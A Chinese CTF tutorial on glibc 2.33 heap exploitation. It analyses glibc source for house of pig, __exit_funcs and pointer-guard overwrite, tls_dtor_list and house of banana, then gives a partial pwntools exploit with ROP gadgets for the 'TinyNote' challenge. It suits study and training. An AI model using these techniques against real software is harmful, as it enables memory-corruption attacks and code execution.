Glibc 2.33利用技巧

Glibc 2.33怎么玩?

一些新增机制

safe-linking

从Glibc 2.32开始,对tcache单向链表引入safe-linking的保护机制:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
/* Caller must ensure that we know tc_idx is valid and there's room
for more chunks. */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);

/* Mark this chunk as "in the tcache" so the test in _int_free will
detect a double free. */
e->key = tcache;

e->next = PROTECT_PTR (&e->next, tcache->entries[tc_idx]);
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}

#define PROTECT_PTR(pos, ptr) \
((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr) PROTECT_PTR (&ptr, ptr)

且从Glibc 2.33开始,safe-linking也被应用到fastbin中。

这样其实并没有给利用带来很大的影响,甚至更加容易leak heap address(只需要free一个chunk)。

tcache alignment

在Glibc 2.31及以前,tcache poisoning可以完成任意地址分配,但是从Glibc 2.32开始,多了一个check,及tcache chunk也需要0x10对齐:

1
2
3
4
5
6
7
8
9
10
11
12
13
/* Caller must ensure that we know tc_idx is valid and there's
available chunks to remove. */
static __always_inline void *
tcache_get (size_t tc_idx)
{
tcache_entry *e = tcache->entries[tc_idx];
if (__glibc_unlikely (!aligned_OK (e)))
malloc_printerr ("malloc(): unaligned tcache chunk detected");
tcache->entries[tc_idx] = REVEAL_PTR (e->next);
--(tcache->counts[tc_idx]);
e->key = NULL;
return (void *) e;
}

利用技巧

目前总结的利用技巧主要分为三种:

  • _IO_FILE
  • __exit_funcs
  • tls_dtor_list
  • link_map

下文的出发点在于已经获得一些primitive可以通过堆利用,完成对一些内存地址的读写,如利用fastbin reverse into tcache或者large bin attack向某个地址写入堆地址等。

_IO_FILE

house of pig

从源码的角度上深入分析house of pig整个利用链:

首先不论是程序正常从__libc_start_main中返回时,还是从显式提供的exit中返回,抑或是abort(有待考证),其原理都是最终需要调用_IO_flush_all_lockp

以exit举例:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
/* Call all functions registered with `atexit' and `on_exit',
in the reverse of the order in which they were registered
perform stdio cleanup, and terminate program execution with STATUS. */
void
attribute_hidden
__run_exit_handlers (int status, struct exit_function_list **listp,
bool run_list_atexit, bool run_dtors)
{
/* First, call the TLS destructors. */
#ifndef SHARED
if (&__call_tls_dtors != NULL)
#endif
if (run_dtors)
__call_tls_dtors ();

/* We do it this way to handle recursive calls to exit () made by
the functions registered with `atexit' and `on_exit'. We call
everyone on the list and use the status value in the last
exit (). */
while (true)
{
struct exit_function_list *cur;

__libc_lock_lock (__exit_funcs_lock);

restart:
cur = *listp;

if (cur == NULL)
{
/* Exit processing complete. We will not allow any more
atexit/on_exit registrations. */
__exit_funcs_done = true;
__libc_lock_unlock (__exit_funcs_lock);
break;
}

while (cur->idx > 0)
{
struct exit_function *const f = &cur->fns[--cur->idx];
const uint64_t new_exitfn_called = __new_exitfn_called;

/* Unlock the list while we call a foreign function. */
__libc_lock_unlock (__exit_funcs_lock);
switch (f->flavor)
{
void (*atfct) (void);
void (*onfct) (int status, void *arg);
void (*cxafct) (void *arg, int status);

case ef_free:
case ef_us:
break;
case ef_on:
onfct = f->func.on.fn;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (onfct);
#endif
onfct (status, f->func.on.arg);
break;
case ef_at:
atfct = f->func.at;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (atfct);
#endif
atfct ();
break;
case ef_cxa:
/* To avoid dlclose/exit race calling cxafct twice (BZ 22180),
we must mark this function as ef_free. */
f->flavor = ef_free;
cxafct = f->func.cxa.fn;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (cxafct);
#endif
cxafct (f->func.cxa.arg, status);
break;
}
/* Re-lock again before looking at global state. */
__libc_lock_lock (__exit_funcs_lock);

if (__glibc_unlikely (new_exitfn_called != __new_exitfn_called))
/* The last exit function, or another thread, has registered
more exit functions. Start the loop over. */
goto restart;
}

*listp = cur->next;
if (*listp != NULL)
/* Don't free the last element in the chain, this is the statically
allocate element. */
free (cur);

__libc_lock_unlock (__exit_funcs_lock);
}

if (run_list_atexit)
RUN_HOOK (__libc_atexit, ());

_exit (status);
}


void
exit (int status)
{
__run_exit_handlers (status, &__exit_funcs, true, true);
}
libc_hidden_def (exit)

不论__run_exit_handlers中间通过__exit_funcs结构做了多少相关操作,exit最终都会进入下面这段逻辑:

1
2
if (run_list_atexit)
RUN_HOOK (__libc_atexit, ());

由于run_list_atexit__run_exit_handlers的第三个参数,为true,那么一定会调用这个HOOK函数。

那么这个HOOK函数是什么,结合IDA以及GDB,可以发现它其实是_IO_cleanup

1
2
3
4
5
6
7
8
9
10
__libc_atexit:00000000001E2608
__libc_atexit:00000000001E2608 ; Segment type: Pure data
__libc_atexit:00000000001E2608 ; Segment permissions: Read/Write
__libc_atexit:00000000001E2608 __libc_atexit segment qword public 'DATA' use64
__libc_atexit:00000000001E2608 assume cs:__libc_atexit
__libc_atexit:00000000001E2608 ;org 1E2608h
__libc_atexit:00000000001E2608 off_1E2608 dq offset _IO_cleanup ; DATA XREF: __run_exit_handlers+1DA↑o
__libc_atexit:00000000001E2608 ; sub_59840+1642↑o ...
__libc_atexit:00000000001E2608 __libc_atexit ends
__libc_atexit:00000000001E2608

这个_IO_cleanup就会执行我们所需要的_IO_flush_all_lockp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
int
_IO_cleanup (void)
{
/* We do *not* want locking. Some threads might use streams but
that is their problem, we flush them underneath them. */
int result = _IO_flush_all_lockp (0);

/* We currently don't have a reliable mechanism for making sure that
C++ static destructors are executed in the correct order.
So it is possible that other static destructors might want to
write to cout - and they're supposed to be able to do so.

The following will make the standard streambufs be unbuffered,
which forces any output from late destructors to be written out. */
_IO_unbuffer_all ();

return result;
}

那么,_IO_flush_all_lockp又干了什么,通过这个调用我们能怎样完成利用:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
int
_IO_flush_all_lockp (int do_lock)
{
int result = 0;
FILE *fp;

#ifdef _IO_MTSAFE_IO
_IO_cleanup_region_start_noarg (flush_cleanup);
_IO_lock_lock (list_all_lock);
#endif

for (fp = (FILE *) _IO_list_all; fp != NULL; fp = fp->_chain)
{
run_fp = fp;
if (do_lock)
_IO_flockfile (fp);

if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
|| (_IO_vtable_offset (fp) == 0
&& fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
> fp->_wide_data->_IO_write_base))
)
&& _IO_OVERFLOW (fp, EOF) == EOF)
result = EOF;

if (do_lock)
_IO_funlockfile (fp);
run_fp = NULL;
}

#ifdef _IO_MTSAFE_IO
_IO_lock_unlock (list_all_lock);
_IO_cleanup_region_end (0);
#endif

return result;
}

可以很清楚地看到,该函数地逻辑可以简单地理解为通过_IO_list_all(实际上指向_IO_2_1_stderr_),遍历标准错误、输出、输入流,根据情况调用_IO_OVERFLOW(fp, EOF)刷新相应流缓冲区。

考虑到利用场景下,我们可以劫持_IO_list_all,或者stderrstdoutstdin_chain成员,从而引入一个fake _IO_FILE结构体(记为fake_fp)。

在满足如下两种条件之一的情况下:(显然第一个条件更为简单)

  • fake_fp->_mode <= 0

    • fake_fp->_IO_write_ptr > fake_fp->_IO_write_base
  • fake_fp->_mode > 0

    • fake_fp->_vtable_offset = 0 && fake_fp->_wide_data->_IO_write_ptr > fake_fp->_wide_data->_IO_write_base

会调用fake_fp->_vtable->_IO_overflow_tvtable + 0x18处的指针指向的函数,且第一个参数为fake_fp自身。

再考虑从Glibc 2.24开始引入的vtable check,可以实现调用任意vtable中的任意函数指针。

而house of pig即是在这个基础上,使得fake_fp->vtable = _IO_str_jumps,那么实际调用的_IO_overflow_t_IO_str_overflow

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
int
_IO_str_overflow (FILE *fp, int c)
{
int flush_only = c == EOF;
size_t pos;
if (fp->_flags & _IO_NO_WRITES)
return flush_only ? 0 : EOF;
if ((fp->_flags & _IO_TIED_PUT_GET) && !(fp->_flags & _IO_CURRENTLY_PUTTING))
{
fp->_flags |= _IO_CURRENTLY_PUTTING;
fp->_IO_write_ptr = fp->_IO_read_ptr;
fp->_IO_read_ptr = fp->_IO_read_end;
}
pos = fp->_IO_write_ptr - fp->_IO_write_base;
if (pos >= (size_t) (_IO_blen (fp) + flush_only))
{
if (fp->_flags & _IO_USER_BUF) /* not allowed to enlarge */
return EOF;
else
{
char *new_buf;
char *old_buf = fp->_IO_buf_base;
size_t old_blen = _IO_blen (fp);
size_t new_size = 2 * old_blen + 100;
if (new_size < old_blen)
return EOF;
new_buf = malloc (new_size);
if (new_buf == NULL)
{
/* __ferror(fp) = 1; */
return EOF;
}
if (old_buf)
{
memcpy (new_buf, old_buf, old_blen);
free (old_buf);
/* Make sure _IO_setb won't try to delete _IO_buf_base. */
fp->_IO_buf_base = NULL;
}
memset (new_buf + old_blen, '\0', new_size - old_blen);

_IO_setb (fp, new_buf, new_buf + new_size, 1);
fp->_IO_read_base = new_buf + (fp->_IO_read_base - old_buf);
fp->_IO_read_ptr = new_buf + (fp->_IO_read_ptr - old_buf);
fp->_IO_read_end = new_buf + (fp->_IO_read_end - old_buf);
fp->_IO_write_ptr = new_buf + (fp->_IO_write_ptr - old_buf);

fp->_IO_write_base = new_buf;
fp->_IO_write_end = fp->_IO_buf_end;
}
}

if (!flush_only)
*fp->_IO_write_ptr++ = (unsigned char) c;
if (fp->_IO_write_ptr > fp->_IO_read_end)
fp->_IO_read_end = fp->_IO_write_ptr;
return c;
}
libc_hidden_def (_IO_str_overflow)

这里的mallocmemcpyfree就是关键所在,即等价于执行了:

  • ptr = malloc((fake_fp->_IO_buf_end - fake_fp->_IO_buf_base) * 2 + 100)
  • memcpy(ptr, fake_fp->_IO_buf_base, fake_fp->_IO_buf_end - fake_fp->_IO_buf_base)
  • free(ptr)

同时注意到,这里存在一个限制:

1
2
3
4
5
6
7
8
9
10
11
12
int flush_only = c == EOF;
...
pos = fp->_IO_write_ptr - fp->_IO_write_base;
if (pos >= (size_t) (_IO_blen (fp) + flush_only))
{
if (fp->_flags & _IO_USER_BUF) /* not allowed to enlarge */
return EOF;
else
{
... // need to be here
}
}

fake_fp->_IO_write_ptr - fake_fp->_IO_write_base > fake_fp->_IO_buf_end - fake_fp->_IO_buf_base,以及fake_fp->_flags & _IO_USER_BUF == 0

做个小小的总结,伪造的_IO_FILE只要满足:

  • _flags & _IO_USER_BUF == 0
  • _mode <= 0
  • _IO_write_ptr - _IO_write_base > _IO_buf_end - _IO_buf_base
  • vtable = _IO_str_jumps (或者其他含有_IO_str_overflow指针的vtable)

就可以愉快地调用mallocmemcpyfree了。

__exit_funcs

上面在分析exit的时候,跳过了__exit_funcs的逻辑,实际上,__exit_funcs作为libc中的全局变量,是可以被修改的:

1
2
3
4
5
6
void
exit (int status)
{
__run_exit_handlers (status, &__exit_funcs, true, true);
}
libc_hidden_def (exit)

首先,关注一下__exit_funcs里,存的到底是个什么东西,实际上,它存放了一个exit_function_list结构体指针:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
struct exit_function_list
{
struct exit_function_list *next;
size_t idx;
struct exit_function fns[32];
};

struct exit_function
{
/* `flavour' should be of type of the `enum' above but since we need
this element in an atomic operation we have to use `long int'. */
long int flavor;
union
{
void (*at) (void);
struct
{
void (*fn) (int status, void *arg);
void *arg;
} on;
struct
{
void (*fn) (void *arg, int status);
void *arg;
void *dso_handle;
} cxa;
} func;
};

其中,毋庸置疑,next成员组织了一条单向链表,它遍历的行为,就是在每轮循环后,用next覆盖__exit_funcs:(不过不是很重要)

1
*listp = cur->next;     // listp = &__exit_funcs

关键在于,idx指明了exit_function的数量,且会从后往前遍历exit_functions数组,并根据其中的flavor成员进行相应的函数调用:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
switch (f->flavor)
{
void (*atfct) (void);
void (*onfct) (int status, void *arg);
void (*cxafct) (void *arg, int status);

case ef_free: // 0
case ef_us: // 1
break;
case ef_on: // 2
onfct = f->func.on.fn;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (onfct);
#endif
onfct (status, f->func.on.arg);
break;
case ef_at: // 3
atfct = f->func.at;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (atfct);
#endif
atfct ();
break;
case ef_cxa: // 4
/* To avoid dlclose/exit race calling cxafct twice (BZ 22180),
we must mark this function as ef_free. */
f->flavor = ef_free;
cxafct = f->func.cxa.fn;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (cxafct);
#endif
cxafct (f->func.cxa.arg, status);
break;
}

不难想到,如果我们劫持__exit_funcs,设置其idx = 1,然后相应地设置fns[0],就可以完成任意函数调用了,如果关注一下case ef_cxa的情况,甚至函数的第一个参数都是可控的。

然而事实却并非那么简单,注意到:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (cxafct);
#endif

/* Pointer mangling support. */
#if IS_IN (rtld)
/* We cannot use the thread descriptor because in ld.so we use setjmp
earlier than the descriptor is initialized. */
# ifdef __ASSEMBLER__
# define PTR_MANGLE(reg) xor __pointer_chk_guard_local(%rip), reg; \
rol $2*LP_SIZE+1, reg
# define PTR_DEMANGLE(reg) ror $2*LP_SIZE+1, reg; \
xor __pointer_chk_guard_local(%rip), reg
# else
# define PTR_MANGLE(reg) asm ("xor __pointer_chk_guard_local(%%rip), %0\n" \
"rol $2*" LP_SIZE "+1, %0" \
: "=r" (reg) : "0" (reg))
# define PTR_DEMANGLE(reg) asm ("ror $2*" LP_SIZE "+1, %0\n" \
"xor __pointer_chk_guard_local(%%rip), %0" \
: "=r" (reg) : "0" (reg))
# endif
#else
# ifdef __ASSEMBLER__
# define PTR_MANGLE(reg) xor %fs:POINTER_GUARD, reg; \
rol $2*LP_SIZE+1, reg
# define PTR_DEMANGLE(reg) ror $2*LP_SIZE+1, reg; \
xor %fs:POINTER_GUARD, reg
# else
# define PTR_MANGLE(var) asm ("xor %%fs:%c2, %0\n" \
"rol $2*" LP_SIZE "+1, %0" \
: "=r" (var) \
: "0" (var), \
"i" (offsetof (tcbhead_t, \
pointer_guard)))
# define PTR_DEMANGLE(var) asm ("ror $2*" LP_SIZE "+1, %0\n" \
"xor %%fs:%c2, %0" \
: "=r" (var) \
: "0" (var), \
"i" (offsetof (tcbhead_t, \
pointer_guard)))
# endif
#endif

简单来说,这里存在一个指针加解密的操作,即f->func.cxa.fn是被加密过的,如果直接写入目标地址,那么显然会SSEGV。

但是考虑得更深一步的话,会发现,这个加密操作ror(ptr, 17) ^ fs:[0x30]中,fs:[0x30]位于TLS处,是完全可写的位置,如果将其修改为一个已知值,那么指针加密的问题就迎刃而解了。

如何定位到TLS的位置,实际上本地环境和远程环境往往存在差异,但是空间并不大,爆破是完全可取的

至于如何在本地定位到这个fs:[0x30],目前我的做法是:

  • 注意到在ld中执行相应逻辑时,PTR_DEMANGEL的宏定义中,取得不是fs:[0x30],而是__pointer_chk_guard_local
  • 因此,完全可以先读到__pointer_chk_guard_local,然后在内存中搜索即可,因为两者值是完全一致的

解决这个问题之后,那么只要设置好加密指针和函数,目的就已经达到了。

同样做个小小的总结,伪造的__exit_funcs可以满足:

  • idx = 1
  • fns[0].flavor = ef_cxa
  • fns[1].func.cxa.fn = rol(fs:[0x30] ^ system, 17)
  • fns[1].func.cxa.arg = &str_bin_sh

就可以在exit的时候,调用system("/bin/sh")了;当然,如果要orw的话,做相应的修改即可,这点与打__free_hook应该没什么区别。

tls_dtor_list

不小心忽略了__run_exit_handlers中,最开始的一部分代码了:

1
2
3
4
5
6
  /* First, call the TLS destructors.  */
#ifndef SHARED
if (&__call_tls_dtors != NULL)
#endif
if (run_dtors)
__call_tls_dtors ();

首先从传参的角度,run_dtors = true,必然进入到__call_tls_dtors中;且从注释里面可以看到,这其实是要对TLS进行析构。

深入分析__call_tls_dtors

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
static __thread struct dtor_list *tls_dtor_list;

/* Call the destructors. This is called either when a thread returns from the
initial function or when the process exits via the exit function. */
void
__call_tls_dtors (void)
{
while (tls_dtor_list)
{
struct dtor_list *cur = tls_dtor_list;
dtor_func func = cur->func;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (func);
#endif

tls_dtor_list = tls_dtor_list->next;
func (cur->obj);

/* Ensure that the MAP dereference happens before
l_tls_dtor_count decrement. That way, we protect this access from a
potential DSO unload in _dl_close_worker, which happens when
l_tls_dtor_count is 0. See CONCURRENCY NOTES for more detail. */
atomic_fetch_add_release (&cur->map->l_tls_dtor_count, -1);
free (cur);
}
}
libc_hidden_def (__call_tls_dtors)

简单明了,tls_dtor_list存放在TLS上,且处于可写的地址处,如果能够劫持tls_dtor_list,就可以任意函数调用了,且第一个参数同样可控:

1
2
3
4
5
6
7
8
9
typedef void (*dtor_func) (void *);

struct dtor_list
{
dtor_func func;
void *obj;
struct link_map *map;
struct dtor_list *next;
};

同样的问题是,该指针仍然是被加密的,如果能够修改fs:[0x30]的值,同样可以完成bypass。

来自安全客的一篇house of banana,利用核心在于劫持_rtld_globallink_map结构,同样是因为这篇house of banana虽然给了poc,但是原理还是得弄清楚,虽然可能不常用,但是说不定什么时候就派上用场了。

_rtld_global作为一个ld中的全局变量,它是一个rtld_global结构体,但如果要从结构体入手分析,则过于复杂,因此选择从被引函数分析入手。

那么问题在于,_rtld_global在哪里被调用了,实际上,它是通过exit中,解析__exit_funcs后调用的_dl_fini中被调用的,如果直接在_dl_fini中下断点,不难根据调用栈定位到。

那么,分析一下_dl_fini:(因为过长,所以选择关键部分)

  • 首先第一部分:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
     for (Lmid_t ns = GL(dl_nns) - 1; ns >= 0; --ns)
    {
    /* Protect against concurrent loads and unloads. */
    __rtld_lock_lock_recursive (GL(dl_load_lock));

    unsigned int nloaded = GL(dl_ns)[ns]._ns_nloaded;
    /* No need to do anything for empty namespaces or those used for
    auditing DSOs. */
    if (nloaded == 0
    #ifdef SHARED
    || GL(dl_ns)[ns]._ns_loaded->l_auditing != do_audit
    #endif
    )
    __rtld_lock_unlock_recursive (GL(dl_load_lock));
    else
    {
    /* Now we can allocate an array to hold all the pointers and
    copy the pointers in. */
    struct link_map *maps[nloaded];

    unsigned int i;
    struct link_map *l;
    assert (nloaded != 0 || GL(dl_ns)[ns]._ns_loaded == NULL);
    for (l = GL(dl_ns)[ns]._ns_loaded, i = 0; l != NULL; l = l->l_next)
    /* Do not handle ld.so in secondary namespaces. */
    if (l == l->l_real)
    {
    assert (i < nloaded);

    maps[i] = l;
    l->l_idx = i;
    ++i;

    /* Bump l_direct_opencount of all objects so that they
    are not dlclose()ed from underneath us. */
    ++l->l_direct_opencount;
    }
    ...

    通常情况下,这里GL(dl_nns)_rtld_global->_dl_nns = 1,从而引出了我们的目标GL(dl_ns)[ns]._ns_loaded,即_rtld_global->_dl_ns[0]->_ns_loaded这个link_map结构体指针;而这里的逻辑,其实就是通过link_map->l_next遍历单向链表,然后依次放入到maps中。

  • 关键在于第二部分:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    #define	DT_FINI_ARRAY	26		/* Array with addresses of fini fct */
    #define DT_INIT_ARRAYSZ 27 /* Size in bytes of DT_INIT_ARRAY */

    for (i = 0; i < nmaps; ++i)
    {
    struct link_map *l = maps[i];

    if (l->l_init_called)
    {
    /* Make sure nothing happens if we are called twice. */
    l->l_init_called = 0;

    /* Is there a destructor function? */
    if (l->l_info[DT_FINI_ARRAY] != NULL
    || (ELF_INITFINI && l->l_info[DT_FINI] != NULL))
    {
    /* When debugging print a message first. */
    if (__builtin_expect (GLRO(dl_debug_mask)
    & DL_DEBUG_IMPCALLS, 0))
    _dl_debug_printf ("\ncalling fini: %s [%lu]\n\n",
    DSO_FILENAME (l->l_name),
    ns);

    /* First see whether an array is given. */
    if (l->l_info[DT_FINI_ARRAY] != NULL)
    {
    ElfW(Addr) *array =
    (ElfW(Addr) *) (l->l_addr
    + l->l_info[DT_FINI_ARRAY]->d_un.d_ptr);
    unsigned int i = (l->l_info[DT_FINI_ARRAYSZ]->d_un.d_val
    / sizeof (ElfW(Addr)));
    while (i-- > 0)
    ((fini_t) array[i]) ();
    }
    ...

    简而言之,这段逻辑在通过l->l_info数组中存放的各个setction的位置,定位fini_array数组,并且进行依次调用。

结合struct link_map结构体数据结构,需要伪造以下结构体成员:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
_rtld_global->_dl_ns[0]->_ns_loaded: (link map) 
offset member
0x0 l_addr (point to program base by default)
0x10 l_next (point to next link map, the length of the linked list should be 4)
0x20 l_real (point to itself)
0x110 l_info[0x1A] (
point to fini_array Elf64_Dyn structure:
typedef struct
{
Elf64_Sxword d_tag; /* Dynamic entry type */
union
{
Elf64_Xword d_val; /* Integer value */
Elf64_Addr d_ptr; /* Address value */
// l_info[0x1A]->d_un.d_ptr + l_addr = &fini_array
} d_un;
} Elf64_Dyn;)
)
0x120 l_info[0x1C] (point to fini_array_size Elf64_Dyn structure) // l_info[0x1C]->d_un.d_val = sizeof(fini_array)
0x31C l_init_called (should be no zero)

关于为什么linked list的长度要是4,其实原文章中提到的是需要>=4,但是在调试所给的PoC时,同时结合源码分析,发现只能=4

这应该是和初始化_rtld_global->_dl_ns->_ns_nloaded的值有关(这里是4),同时满足3个assert:

1
2
3
4
assert (i < nloaded);
...
assert (ns != LM_ID_BASE || i == nloaded);
assert (ns == LM_ID_BASE || i == nloaded || i == nloaded - 1);

故在ns = LM_ID_BASE的情况下(默认如此),满足的约束为i == nloaded

不过还需具体情况下,进行调试分析得出。

同样小小总结一下,我们主要需要伪造一个link_map结构体,即_rtld_global->_dl_ns[0]->_ns_loaded指向的结构体:

  • l_addr为基址
  • l_next维护的单向链表长度为4
  • l_real为结构体本身,即对于链表中每个link_map节点,其值必须等于本身
  • l_info[0x1A]struct Elf64_Dyn *,其指向的结构体需要满足l_info[0x1A]->d_un.d_ptr + l_addr = fake_fini_array
  • l_info[0x1C]同为struct Elf64_Dyn *,其指向的结构体需要满足l_info[0x1C]->d_un.d_val = sizeof(fake_fini_array)
  • l_init_called需不为0
  • fake_fini_array中布置好需要调用的函数指针

那么在程序exit进入_dl_fini后,就能调用目标函数。

示例

西湖论剑2021的TInyNote,这题需要通过fastbin_reverse_into_tcache,来实现“任意”地址写tcache_pthread_struct的地址。
但是,像上面提到的,由于tcache chunk现在需要对齐到0x10,且fd指针是受safe-linking机制保护的指针(值本身是非法地址),所以只能够实现向0x???????????8的位置,写入tcache_pthread_struct的地址。
那么综合考虑以上的利用方案,我们可以修改stderr->_chain,也可以修改__exit_funcs;至于_rtld_global->_dl_ns[0]->_ns_loaded__call_tls_dtors,都无法修改成合法的地址(因为它们地址都是0x??????????10)。
所以下面的exp主要通过两种方案来实现orw,一种是改stderr->_chain,通过exit触发_IO_flush_all_lockp完成利用;一种是伪造__exit_funcs,不过同样是在exit的时候完成利用。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
import sys, os, re

context(arch='amd64', os='linux', log_level='debug')

_proc = os.path.abspath('./TinyNote')
_libc = os.path.abspath('./libc-2.33.so')

libc = ELF(_libc)
elf = ELF(_proc)

_debug = int(sys.argv[1]) if len(sys.argv) > 1 else 0

p = process(argv=[_proc])
if _debug != 0:
gdb.attach(p)

# menu
choose_items = {
"add": 1,
"edit": 2,
"show": 3,
"delete": 4,
"bonus": 5
}

def choose(idx):
p.sendlineafter("Choice:", str(idx))

def add(idx):
choose(choose_items['add'])
p.sendlineafter("Index:", str(idx))

def edit(idx, content):
choose(choose_items['edit'])
p.sendlineafter("Index:", str(idx))
p.sendafter("Content:", content)

def show(idx):
choose(choose_items['show'])
p.sendlineafter("Index:", str(idx))

def delete(idx):
choose(choose_items['delete'])
p.sendlineafter("Index:", str(idx))

def arbitrary_write(addr, content):
delete(1)
edit(0, "\x02")
edit(1, p64(addr ^ (heap_base >> 12)))
add(1)
add(2)
edit(2, content)

#################################### Method 1: hijack stderr
# leak heap base
add(0)
delete(0)
add(0)
show(0)
p.recvuntil("Content:")
heap_base = u64(p.recv(8)) << 12

# leak libc base
for i in range(0x23):
add(1)
add(2)
delete(1)
delete(2)
edit(2, p64((heap_base + 0x290) ^ (heap_base >> 12)))
add(1)
add(1)
edit(1, p64(0) + p64(0x421))
delete(0)
add(0)
show(0)
p.recvuntil("Content:")
libc_base = u64(p.recv(8)) - 0x1e0ba0 - 0x450

# malloc tcache_struct
add(1)
delete(0)
delete(1)
edit(1, p64((heap_base + 0x10) ^ (heap_base >> 12)))
add(0)
add(0) # chunk 0 points to tcache_struct

# prepare fastbin
add(1)
for i in range(5):
add(2)
edit(2, p64((heap_base + 0x310 + 0x20 * i) ^ (heap_base >> 12)))
add(2)
edit(2, p64((libc_base + libc.sym['_IO_2_1_stderr_'] + 0x68 - 0x18) ^ (heap_base >> 12)))
edit(0, "\x07") # "fill" the tcache bin
delete(1) # put into fastbin
edit(1, p64((heap_base + 0x2F0) ^ (heap_base >> 12))) # prepare for fastbin reverse into tcache attack

# fastbin reverse into tcache attack, this will change stderr->_chain
edit(0, "\x00") # "clear" the tcache bin
add(1)

# forge stdout
edit(0, "\x00") # "clear" the tcache bin
arbitrary_write(heap_base + 0x30, p64(0) + p64(0xFFFFFFFFFFFF)) # _IO_write_base = 0, _IO_write_ptr = 0xFFFF (make sure _IO_write_ptr - _IO_write_base > _IO_buf_end - _IO_buf_base)
arbitrary_write(heap_base + 0x40, p64(0) + p64(heap_base + 0xE00)) # _IO_buf_base = src buffer start
arbitrary_write(heap_base + 0x50, p64(heap_base + 0xE00 + 0xB0)) # _IO_buf_end = source buffer end
arbitrary_write(heap_base + 0xe0, p64(0) + p64(libc_base + 0x1e2560)) # vtable = _IO_str_jumps

# ORW
def orw_payload(libc_base, orwchain_base):
pop_rdi = libc_base + 0x0000000000028a55 # pop rdi ; ret
pop_rsi = libc_base + 0x000000000002a4cf # pop rsi ; ret
pop_rdx = libc_base + 0x00000000000c7f32 # pop rdx ; ret
func_cnt = 3
args_cnt = 2 + 3 + 1
payload = ""
payload += flat([pop_rdi, orwchain_base + func_cnt * 8 + args_cnt * 0x10, pop_rsi, 0, libc_base + libc.sym['open']])
payload += flat([pop_rdi, 3, pop_rsi, orwchain_base + 0x100, pop_rdx, 0x40, libc_base + libc.sym['read']])
payload += flat([pop_rdi, orwchain_base + 0x100, libc_base + libc.sym['puts']])
payload += "./flag"
return payload

rdi2rdx = libc_base + 0x000000000014a0a0 # mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rsp], rax ; call qword ptr [rdx + 0x20]
rdx2rsp = libc_base + 0x0000000000059020 # mov rsp, rdx ; ret
add_rsp_0x28 = libc_base + 0x0000000000044ce5 # add rsp, 0x28 ; ret

